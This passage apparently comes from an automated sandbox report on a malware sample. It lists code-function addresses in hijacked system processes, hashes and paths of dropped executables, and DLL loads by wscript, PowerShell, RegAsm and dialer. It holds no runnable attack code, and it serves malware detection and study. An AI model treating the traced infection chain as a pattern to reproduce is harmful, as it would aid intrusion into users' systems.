Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFD850 13_3_00007DF488BFD850
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46834 13_3_00007DF488C46834
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C37860 13_3_00007DF488C37860
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CB780C 13_3_00007DF488CB780C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C217C4 13_3_00007DF488C217C4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2C7E8 13_3_00007DF488C2C7E8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C077A0 13_3_00007DF488C077A0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2F954 13_3_00007DF488C2F954
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC78D8 13_3_00007DF488CC78D8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC58AC 13_3_00007DF488CC58AC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF29FC 13_3_00007DF488BF29FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46A10 13_3_00007DF488C46A10
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BE4A14 13_3_00007DF488BE4A14
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C34A14 13_3_00007DF488C34A14
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C3A9C4 13_3_00007DF488C3A9C4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46B20 13_3_00007DF488C46B20
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C0EC44 13_3_00007DF488C0EC44
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF0C44 13_3_00007DF488BF0C44
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BE1BFC 13_3_00007DF488BE1BFC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C38BE8 13_3_00007DF488C38BE8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC7CF4 13_3_00007DF488CC7CF4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C39E68 13_3_00007DF488C39E68
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC3DE0 13_3_00007DF488CC3DE0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CCCF3C 13_3_00007DF488CCCF3C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C56F20 13_3_00007DF488C56F20
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2CEC4 13_3_00007DF488C2CEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFBEC4 13_3_00007DF488BFBEC4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CBC01C 13_3_00007DF488CBC01C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C46F78 13_3_00007DF488C46F78
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C36FA0 13_3_00007DF488C36FA0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C4B094 13_3_00007DF488C4B094
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C840A0 13_3_00007DF488C840A0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC8238 13_3_00007DF488CC8238
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2D210 13_3_00007DF488C2D210
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC11BC 13_3_00007DF488CC11BC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CD41DC 13_3_00007DF488CD41DC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF3314 13_3_00007DF488BF3314
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C2C45C 13_3_00007DF488C2C45C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C5A3F4 13_3_00007DF488C5A3F4
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CD93FC 13_3_00007DF488CD93FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BEE414 13_3_00007DF488BEE414
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC83B8 13_3_00007DF488CC83B8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC73A0 13_3_00007DF488CC73A0
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C38534 13_3_00007DF488C38534
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C4F4FC 13_3_00007DF488C4F4FC
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BF4480 13_3_00007DF488BF4480
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CC8750 13_3_00007DF488CC8750
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488CD46F8 13_3_00007DF488CD46F8
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C7B68C 13_3_00007DF488C7B68C
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BFD688 13_3_00007DF488BFD688
Source: C:\Windows\System32\OpenWith.exe Code function: 13_2_0000024AB87F0C5C 13_2_0000024AB87F0C5C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71032D00 14_2_000001FF71032D00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102262C 14_2_000001FF7102262C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103E368 14_2_000001FF7103E368
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105CBBC 14_2_000001FF7105CBBC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF710663FC 14_2_000001FF710663FC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71060238 14_2_000001FF71060238
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71037240 14_2_000001FF71037240
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7102C254 14_2_000001FF7102C254
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71035AAC 14_2_000001FF71035AAC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71060D58 14_2_000001FF71060D58
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71055578 14_2_000001FF71055578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105959C 14_2_000001FF7105959C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71054DB0 14_2_000001FF71054DB0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103F5E8 14_2_000001FF7103F5E8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71050440 14_2_000001FF71050440
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105ECAC 14_2_000001FF7105ECAC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103DCB4 14_2_000001FF7103DCB4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF710214D0 14_2_000001FF710214D0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71046CE0 14_2_000001FF71046CE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103C720 14_2_000001FF7103C720
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71053F38 14_2_000001FF71053F38
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105A7E4 14_2_000001FF7105A7E4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103CFE0 14_2_000001FF7103CFE0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104D81C 14_2_000001FF7104D81C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104764C 14_2_000001FF7104764C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71043E6C 14_2_000001FF71043E6C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104867C 14_2_000001FF7104867C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7103BE88 14_2_000001FF7103BE88
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71055E90 14_2_000001FF71055E90
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71036EF4 14_2_000001FF71036EF4
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71040144 14_2_000001FF71040144
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105E94C 14_2_000001FF7105E94C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105F198 14_2_000001FF7105F198
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71053A00 14_2_000001FF71053A00
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71063A15 14_2_000001FF71063A15
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71054A18 14_2_000001FF71054A18
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7106083C 14_2_000001FF7106083C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7104705C 14_2_000001FF7104705C
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF71054898 14_2_000001FF71054898
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF710558E0 14_2_000001FF710558E0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Code function: 14_2_000001FF7105F908 14_2_000001FF7105F908
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_0040223E 19_2_0040223E
Source: C:\Users\user\AppData\Roaming\D4C0.vmt.exe Code function: 19_2_004025C5 19_2_004025C5
Source: C:\Users\user\AppData\Roaming\gfiecjd Code function: 22_2_004025C5 22_2_004025C5
Source: C:\Users\user\AppData\Local\Temp\F324.exe Code function: 23_2_0040154C 23_2_0040154C
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00585072 24_2_00585072
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005AB06B 24_2_005AB06B
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005AB18B 24_2_005AB18B
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A65E0 24_2_005A65E0
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00587862 24_2_00587862
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_0059B892 24_2_0059B892
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00584883 24_2_00584883
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005AA919 24_2_005AA919
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A6A78 24_2_005A6A78
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00569A00 24_2_00569A00
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_00589C03 24_2_00589C03
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005ABFC0 24_2_005ABFC0
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A2198 25_2_030A2198
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030BB35C 25_2_030BB35C
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030AC2F9 25_2_030AC2F9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030F4438 25_2_030F4438
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030BB97E 25_2_030BB97E
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030C5F08 25_2_030C5F08
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A6E6A 25_2_030A6E6A
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\F324.exe 82A6847B83BF25CB582BB942735A32197BD9B7B490CE50F34C4976005F4F9BED
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\F557.exe 2FA632C146A49F8C954B231EBCC0DF2CCDBECD23797D084C423C0010F3380332
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe 2FA632C146A49F8C954B231EBCC0DF2CCDBECD23797D084C423C0010F3380332
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\D4C0.vmt.exe 09846F324BEE9384EE50934E61B417FDE37B86D4CA60530E77C4D63920D3E94C
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 030A7F70 appears 32 times
Source: C:\Windows\SysWOW64\explorer.exe Code function: String function: 030A8801 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: String function: 005813C2 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: String function: 0057BF00 appears 136 times
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: String function: 00581A00 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6252 -s 720
Source: xwREqjHUEv.exe, 00000000.00000002.2013828842.0000000000445000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWiFiDisplay.exeDVarFileInfo$ vs xwREqjHUEv.exe
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Section loaded: edputil.dll Jump to behavior
